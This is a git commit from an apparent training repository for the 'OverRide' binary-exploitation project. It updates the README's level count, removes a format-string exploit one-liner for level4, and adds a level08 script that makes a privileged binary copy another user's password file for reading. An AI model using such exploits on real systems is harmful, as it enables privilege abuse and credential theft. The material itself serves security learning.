rename all the exploits to exploit.sh
This commit is contained in:
@ -1,6 +1,6 @@
|
||||
# OverRide
|
||||
|
||||
Override is a project where the goal is to exploit vulnerabilities in binaries by reverse engineering them to make them display a file containing passwords. It is divided into 10 levels (level00 to level09).
|
||||
Override is a project where the goal is to exploit vulnerabilities in binaries by reverse engineering them to make them display a file containing passwords. It is divided into 9 mandatory levels and 1 bonus level (level00 to level08, level09 being the bonus).
|
||||
|
||||
## Methodology
|
||||
|
||||
|
@ -1 +0,0 @@
|
||||
(python -c 'print "\x10\x98\x04\x08" + "%16930112p" + "%12$n"'; cat) | ./level4
|
3
level08/ressources/exploit.sh
Normal file
3
level08/ressources/exploit.sh
Normal file
@ -0,0 +1,3 @@
|
||||
mkdir -p backups/home/users/level09
|
||||
~/level08 /home/users/level09/.pass
|
||||
cat backups/home/users/level09/.pass
|
Reference in New Issue
Block a user